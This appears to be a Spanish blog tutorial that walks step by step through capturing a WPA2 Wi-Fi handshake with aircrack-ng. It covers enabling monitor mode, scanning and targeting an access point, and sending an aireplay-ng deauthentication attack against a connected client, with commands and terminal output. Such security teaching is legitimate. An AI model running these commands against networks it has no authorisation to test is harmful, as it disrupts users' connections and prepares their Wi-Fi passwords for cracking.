Captura de Handshake usando la suit de Aircrack-ng
En este post te enseñaré a capturar un handshake de una red wifi utilizando la suite Aircrak-ng con el método de desautenticación.
Un handshake es una petición entre un cliente y un punto de acceso para establecer una conexión. Cuando capturamos un Handshake, no se captura la contraseña, sino una serie de parámetros, donde está la contraseña Wifi pero cifrada.
Antes de empezar
Para la captura del handshake, es necesario tener un adaptador wifi que permita habilitar el modo monitor, esto es necesario para poner nuestro adaptador en modo escucha. En este caso yo estoy utilizando un adaptador de la marca Alfa, modelo AWUS1900, para más información sobre adaptadores puedes consultar las recomendaciones de la página de aircrack-ng o el listado de kalitut
Punto de inicio
Lo primero que necesitamos hacer es identificar nuestras interfaces, para ello utilizaremos el comando iwconfig
:
┌[parrot]─[00:00-00/00]─[/home/masiouslow]
└╼masiouslow$iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wlan0 IEEE 802.11 ESSID:"Hello_world"
Mode:Managed Frequency:5.24 GHz Access Point: 50:77:B3:EE:65:33
Bit Rate=292.5 Mb/s Tx-Power=17 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
Link Quality=52/70 Signal level=-58 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
wlx00c0caab5835 unassociated Nickname:"WIFI@RTL8814AU"
Mode:Managed Frequency=2.412 GHz Access Point: Not-Associated
Sensitivity:0/0
Retry:off RTS thr:off Fragment thr:off
Power Management:off
Link Quality=0/100 Signal level=0 dBm Noise level=0 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Esto nos sirve para identificar cuál es el adaptador con el que trabajaremos, en mi caso es: wlx00c0caab5835
también podemos ver en que estado se encuentra: Mode:Managed
Matar los procesos que interfieren
El siguiente paso consiste en matar los procesos que interfieren con la suite de Aircrak-ng, podrían causar un mal funcionamiento, para ello ejecutamos el comando sudo airmon-ng check kill
:
┌[parrot]─[00:00-00/00]─[/home/masiouslow]
└╼masiouslow$sudo airmon-ng check kill
[sudo] password for masiouslow:
Killing these processes:
PID Name
798 wpa_supplicant
El parámetro check
lista los procesos que interfieren, kill
los elimina.
Modo monitor
Ahora activaremos el modo monitor, esto permite que nuestro adaptador pueda capturar paquetes.
Para activar el modo monitor existen varias opciones, esta vez lo haré con la herramienta airmon-ng.
Introducimos en la terminal el siguiente comando sudo airmon-ng start wlx00c0caab5835
en tu caso has de substituir wlx00c0caab5835
por el nombre de tu adaptador.
┌[parrot]─[00:00-00/00]─[/home/masiouslow]
└╼masiouslow$sudo airmon-ng start wlx00c0caab5835
[sudo] password for masiouslow:
PHY Interface Driver Chipset
phy0 wlan0 rtw_8822be Realtek Semiconductor Co., Ltd. RTL8822BE 802.11a/b/g/n/ac WiFi adapter
phy1 wlx00c0caab5835 rtl8814au Realtek Semiconductor Corp. RTL8814AU 802.11a/b/g/n/ac
(monitor mode enabled)
Es posible que al ejecutar este comando el nombre del adaptador cambie y se agregue la terminación mon
al nombre original, en mi caso no, pero se ha de tener en cuenta.
Para verificar que lo hemos hecho correctamente podemos escribir de nuevo iwconfig
:
┌[parrot]─[00:00-00/00]─[/home/masiouslow]
└╼masiouslow$iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wlan0 IEEE 802.11 ESSID:off/any
Mode:Managed Frequency:5.24 GHz Access Point: Not-Associated
Tx-Power=23 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
wlx00c0caab5835 IEEE 802.11AC ESSID:"MIWIFI_d6hP" Nickname:"WIFI@RTL8814AU"
Mode:Monitor Frequency:2.457 GHz Access Point: 50:78:B3:EE:61:35
Sensitivity:0/0
Retry:off RTS thr:off Fragment thr:off
Power Management:off
Link Quality=1/100 Signal level=-99 dBm Noise level=0 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Después de esto vemos que el estado ya ha cambiado a modo monitor Mode:Monitor
Descubrir redes wifi disponibles
Para fijar un objetivo primero necesitamos escanear los puntos de acceso que tenemos a nuestro alcance.
Lo que haremos ahora será listar los puntos de acceso de toda la red, aparte de definir un objetivo claro nos permite tener un poco más de información
el comando para realizar este listado es sudo airodump-ng wlx00c0caab5835
pero recuerda que dependiendo del nombre de tu adaptador tendrás que cambiar el último parámetro:
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
1C:B0:44:4C:CD:2F -47 62 0 0 11 195 WPA2 CCMP PSK Atacks_this
43-05-D9-79-A0-11 -73 60 16 0 1 130 WPA2 CCMP PSK Test_1
23-C9-8C-B7-B5-18 -72 66 13 0 6 130 WPA2 CCMP PSK Test_2
64-FE-B8-8E-FB-F7 -75 62 5 0 1 130 WPA2 CCMP PSK Test_3
96-BD-08-0E-FD-AA -76 70 18 0 11 130 WPA2 CCMP PSK Test_4
BA-F0-C0-20-C1-23 -76 38 9 0 11 130 WPA2 CCMP PSK Test_5
BSSID STATION PWR Rate Lost Frames Notes Probes
F4:69:42:90:FD:AF 7C-1D-00-52-8F-68 -83 0 - 1 0 2
Una vez listado nuestro objetivo podemos detener el proceso de búsqueda Ctrl+C
:
Quitting...
Una vez hecho esto vamos a recolectar la información que nos será útil al momento de capturar el handshake.
Lo que vamos a necesitar es la dirección mac de la red (BSSID)
y el canal (CH)
los demás datos nos aportan también mucha información, si quieres profundizar en el tema te recomiendo que visites la guía de Airodump-ng
La red que voy a atacar es la que se llama Atacks_this
como podemos ver el BSSID es 1C:B0:44:4C:CD:2F
y está en el canal 11
.
Nos centramos en el objetivo
Con los datos previamente obtenidos vamos a escanear solamente a nuestro objetivo, esto nos permite ver con facilidad los clientes que están conectados a la red.
Lo podemos hacer con el mismo comando de antes, pero agregando -d más el BSSID sudo airodump-ng wlx00c0caab5835 -d 1C:B0:44:4C:CD:2F
:
CH 1 ][ Elapsed: 24 s ][ 2022-03-06 20:45
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
1C:B0:44:4C:CD:2F -28 85 0 0 11 130 WPA2 CCMP PSK Try_to_hack_this
BSSID STATION PWR Rate Lost Frames Notes Probes
Podemos ver que ahora solo nos muestra la red a la que queremos atacar, si nos fijamos en la segunda fila, debajo de donde pone STATION no aparece nada, eso es porque no hay ningún cliente conectado a la red, voy a conectar un móvil para que veas la diferencia:
CH 2 ][ Elapsed: 0 s ][ 2022-03-06 20:52
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
1C:B0:44:4C:CD:2F -29 15 3 0 11 130 WPA2 CCMP PSK Try_to_hack_this
BSSID STATION PWR Rate Lost Frames Notes Probes
1C:B0:44:4C:CD:2F 28:16:7F:6D:4C:2C -45 0 - 1e 141 23
Ahora sí, vemos que hay un cliente 28:16:7F:6D:4C:2C
conectado al punto de acceso
Con esto ya tendríamos todos los datos que necesitamos para la captura del handshake
A la espera de un handshake
A continuación nos vamos a poner en escucha, a la espera de capturar un handshake.
Abrimos una nueva ventana y ejecutamos este comando sudo airodump-ng -w test1 -c 11 --bssid 1C:B0:44:4C:CD:2F wlx00c0caab5835
:
CH 1 ][ Elapsed: 2 mins ][ 2022-03-19 20:32 ][ fixed channel wlx00c0caab5835: 2
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
1C:B0:44:4C:CD:2F -27 14 305 16 0 11 130 WPA2 CCMP PSK Try_to_hack_this
BSSID STATION PWR Rate Lost Frames Notes Probes
1C:B0:44:4C:CD:2F 28:16:7F:6D:4C:2C -30 1e- 1e 125 137
En -w test
asignamos el nombre del archivo con el que queremos que se guarde nuestro handshake.
Con -c 11
escogemos el canal en el que opera nuestro objetivo
Asignamos el punto de acceso con --bssid 1C:B0:44:4C:CD:2F
Y por último seleccionamos nuestro adaptador de red wlx00c0caab5835
Ahora podríamos recolectar el handshake de una forma pasiva esperando a que algún dispositivo se autentifique en la red, pero esto puede tardar mucho
Ataque de desautenticación
A continuacion, vamos a desautentificar a un dispositivo de la red, esto forzará a que se vuelva a autentificar y capturar así el handshake
En otra ventana ejecutamos el comando sudo aireplay-ng -0 1 -a 1C:B0:44:4C:CD:2F -c 28:16:7F:6D:4C:2C wlx00c0caab5835
Hasta aquí el post, espero que te haya gustado y te sea útil
Si te gusta el trabajo que estoy haciendo y te gustaría apoyarme puedes hacerlo con una donación en bitcoin